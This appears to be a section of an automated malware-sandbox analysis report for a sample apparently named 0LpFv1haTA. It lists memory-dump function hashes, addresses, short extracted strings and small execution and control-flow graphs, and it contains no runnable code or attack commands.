                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f52aa52732465817a65ce77c845855792959c5441924838aabd731841081cd8b
                                                                                                                                                                                                  • Instruction ID: 9d3109117d83b142543646bafdca08d84c552f64f63063c68c21bd8c8bf8654c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f52aa52732465817a65ce77c845855792959c5441924838aabd731841081cd8b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47325A71C096598FE799EF6484547F8B7B1EF6A380F5010BAD00DEB2D2DB395A84CB14
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2fde17261c18a82f233716c8f970ba8e9b4919a08b6f6d450051abcc2042b414
                                                                                                                                                                                                  • Instruction ID: f4809b532ad30b499c64f37c4e9786b7f9b3d01479759e140f812b7d632476b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fde17261c18a82f233716c8f970ba8e9b4919a08b6f6d450051abcc2042b414
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF12D870D19A1D8FDB99EB28C894BE8B7B2FF59340F5041EAD00DE7292DA356D84CB10
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: M_^=$M_^>$M_^?$M_^@
                                                                                                                                                                                                  • API String ID: 0-1339898167
                                                                                                                                                                                                  • Opcode ID: 630051ad93e461f03d24fdd04e3d2d15c0bd90503f0bfcc9be4ceff52aee8f8b
                                                                                                                                                                                                  • Instruction ID: b09631805e09dd235b80054d55c8ca86675c6bd621079a77c38a4a215b201c1c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630051ad93e461f03d24fdd04e3d2d15c0bd90503f0bfcc9be4ceff52aee8f8b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2972A57091965D8FE786EB28C450BE97BB2FF5A384F4141EAC00DDB292DE365E84CB50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6ddff5ec05fb7653c98c760d3631322c7525d0f8f101c10abe313c85b2e95b8c
                                                                                                                                                                                                  • Instruction ID: 933be7691658df1e7a10d2c710a8b41be21317a1bbef1b079b44cb467eed65de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ddff5ec05fb7653c98c760d3631322c7525d0f8f101c10abe313c85b2e95b8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88626470919A5D8FE796EB28C454BA87BB2FF5A344F4140EAC00DDB392DE365E84CB50
Memory Dump Source
• Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  • Instruction ID: 4c3efc589e5289499db6d9e82d1a01ba6428ee0527028f525947bdafb82e23ea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c33d74fe700e8c7e4c76e254b863eff9c128098b3bb0048b932d8a6aa97827b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79310471C0DA894FE74AAB2488662F83BB1FF46380F1501A7D049DB2E3DE2D2989C755
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6ed63d729caec1cdbe9cc51e616136c2ad69137b5915e309c7957d930fffbf25
                                                                                                                                                                                                  • Instruction ID: 0b60169aa82ccbe0a9efdb80e3ca328afeee78eb74fce912b41ed97f4227f32c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed63d729caec1cdbe9cc51e616136c2ad69137b5915e309c7957d930fffbf25
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81315471D0865E8FDB89EF68D4516EDBBF1FF99301F00006AE409E7292CB396994CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 677e27370b86fc01266633e2bf2a136bc330b9e1d7a762a11b713988356faf61
                                                                                                                                                                                                  • Instruction ID: 763529d81ad2a08a03981db61de34e8f92f0c187d703be04c1c37c936bc18dde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 677e27370b86fc01266633e2bf2a136bc330b9e1d7a762a11b713988356faf61
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C221B03190DA5D8FDB55EF6898055ED7BB1FF8A311F04067BE009D3281CB3969418B91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e7a16975dd5488e06103ccfdd5e136415a1026212a514aca4e6dcb55b81f8381
                                                                                                                                                                                                  • Instruction ID: ded602573072eb0b1b3c2dac1912d4116f42ba6885aaf3ba467e8c6ae5100542
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7a16975dd5488e06103ccfdd5e136415a1026212a514aca4e6dcb55b81f8381
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E221D7B1D0D68A9FE746EB2888582E97FB1FF5A340F8544E6C048DB292EF355A49C710
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 782a83d94341f30898a828fa9b72f5e0e058e9ec5e63bf9101f0bade93fcc33a
                                                                                                                                                                                                  • Instruction ID: 001f1d554ef427ce2f0d09762416a476315e40a56bbb0e27ea4e71d61913b639
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 782a83d94341f30898a828fa9b72f5e0e058e9ec5e63bf9101f0bade93fcc33a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF01432D0892D8FDF94EB98D845AECB7B1FB58300F40016AD00DE3251DF3468818B40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2c48120a06104564c32ce2b45265eea0573a2902450a8a8922239a9380e744ab
                                                                                                                                                                                                  • Instruction ID: c379b1bcfeb195d8ffb9f5b8ea69e37e3d9dae9aa3d9c268a9b1cfd0c4ee7afb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c48120a06104564c32ce2b45265eea0573a2902450a8a8922239a9380e744ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0E931D0E68C8FEB116FA4D8152FABBA0FF56351F4111B7E108E71C2DB285014875A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 78f5be1af1349a97ca0b62b6b0c5764482e556dfee4aa511c7d3c995914ee788
                                                                                                                                                                                                  • Instruction ID: 6e10490662357b869a0c4b5dcb711cb402248809ebdc4ef27513c7dedb061e0a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78f5be1af1349a97ca0b62b6b0c5764482e556dfee4aa511c7d3c995914ee788
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F03A31D0651A8FEB08AB94D4506FEB7B0EF55341F40102AD40AA32C2DE3859848A65
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 652f54f92f8736d5b7e8322c0c57696cc9e9b70f7617929b70ad44ef4fc6758e
                                                                                                                                                                                                  • Instruction ID: be523db585e18e2f5ccbad27f61b22df5049463ffba8f9428276e20a11162335
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 652f54f92f8736d5b7e8322c0c57696cc9e9b70f7617929b70ad44ef4fc6758e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE0D879D1CA5D8FDB41BB98A8056E5B7A1FB89308F0001AAD40CD71C1D72D5811D755
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a007b3c010e8465ec302f4d3076f64c128f6f8a0307489c1ce6d910ff8da74c9
                                                                                                                                                                                                  • Instruction ID: 272b1e25f38651bb5e7ebc7ef455d3bb93fb7f8ea6b3af91969526b8979ef669
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a007b3c010e8465ec302f4d3076f64c128f6f8a0307489c1ce6d910ff8da74c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6D01223F18C5B1FD654A66CA8456A552C1EB94690F4446B3D40EC3289EE6DA9834384
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b70b9b89302d274de903e2f9d202edd91076b7e03aab6ae7bfc59a1a156faacf
                                                                                                                                                                                                  • Instruction ID: 84c6f45c1b19f54ab613def979ed7ed0088159720a01f7dd3b7998e425e7365b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b70b9b89302d274de903e2f9d202edd91076b7e03aab6ae7bfc59a1a156faacf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAE0D872C4D3C94FD7566F2459151E87F70FF46300F4501B7E588860D3EB69A618C755
                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID: aH$!M_I$(aH$0aH$8aH$@aH$HaH$cH$dH
• API String ID: 0-3707677422
• Opcode ID: dfbe5c76f36566bc9811647b9cfb9ad2603a8d94390a6278e032d47bf3380dbe
• Instruction ID: 0e70f248da8ed683d6db9f89daecf13ad2d03421f2850042f97ff7655ad99778
• Opcode Fuzzy Hash: dfbe5c76f36566bc9811647b9cfb9ad2603a8d94390a6278e032d47bf3380dbe
• Instruction Fuzzy Hash: A4510C23D0E6C68FF35657B868190746FA0FF52A52F4942FBC488870E7EA2C5D458349
Strings
Memory Dump Source
• Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID: M_^=$M_^>$M_^?$M_^@
• API String ID: 0-1339898167
• Opcode ID: d045b1776b4013a9e41832a66d00135559c9ed8aaa4a1923af920e896ed4bfbe
• Instruction ID: fd37681e46afeb7923388121adb58663e4b170174f56999d0240a2441edd4623
• Opcode Fuzzy Hash: d045b1776b4013a9e41832a66d00135559c9ed8aaa4a1923af920e896ed4bfbe
• Instruction Fuzzy Hash: B821F87392A165E9D2417BBC78455DA3774EF403B8F4547B6E09CCD093EE1C208687A8

Execution Graph

Execution Coverage: 16.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph nodes:
• 3659: 7ff848f170e9
• 3661: 7ff848f170ef (LoadLibraryExW)
• 3662: 7ff848f1720c
execution_graph edges: 3659->3661, 3661->3662

Control-flow Graph

• Executed
• Not Executed
control_flow_graph nodes (basic blocks):
• 328: 7ff848f170e9-7ff848f170ed
• 329: 7ff848f170ef-7ff848f170f6
• 330: 7ff848f170f7-7ff848f17190
• 334: 7ff848f171ac-7ff848f1720a (LoadLibraryExW)
• 335: 7ff848f17192-7ff848f171a9
• 336: 7ff848f1720c
• 337: 7ff848f17212-7ff848f17264
control_flow_graph edges: 328->329, 328->330, 329->330, 330->334, 330->335, 334->336, 334->337, 335->334, 336->337
Memory Dump Source
• Source File: 0000002F.00000002.3947940143.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
• Instruction ID: dff464a67ecfcebc9628337189786532868b5f73b27e3f7374863cf76b3c33ff
• Opcode Fuzzy Hash: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
• Instruction Fuzzy Hash: C7514C70908A5C8FEB98EF58D889BE9BBF0FB59311F0041AED04DE7252DB759885CB40

Execution Graph

Execution Coverage: 15.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph nodes:
• 2750: 7ff848f170e9
• 2751: 7ff848f170ef (LoadLibraryExW)
• 2753: 7ff848f1720c
execution_graph edges: 2750->2751, 2751->2753

Control-flow Graph

• Executed
• Not Executed
control_flow_graph nodes (basic blocks):
• 215: 7ff848f170e9-7ff848f170ed
• 216: 7ff848f170ef-7ff848f170f6
• 217: 7ff848f170f7-7ff848f17190
• 221: 7ff848f171ac-7ff848f1720a (LoadLibraryExW)
• 222: 7ff848f17192-7ff848f171a9
• 223: 7ff848f1720c
• 224: 7ff848f17212-7ff848f17264
control_flow_graph edges: 215->216, 215->217, 216->217, 217->221, 217->222, 221->223, 221->224, 222->221, 223->224
Memory Dump Source
• Source File: 00000030.00000002.4550628492.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff848f10000_0LpFv1haTA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
• Instruction ID: dff464a67ecfcebc9628337189786532868b5f73b27e3f7374863cf76b3c33ff
• Opcode Fuzzy Hash: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
• Instruction Fuzzy Hash: C7514C70908A5C8FEB98EF58D889BE9BBF0FB59311F0041AED04DE7252DB759885CB40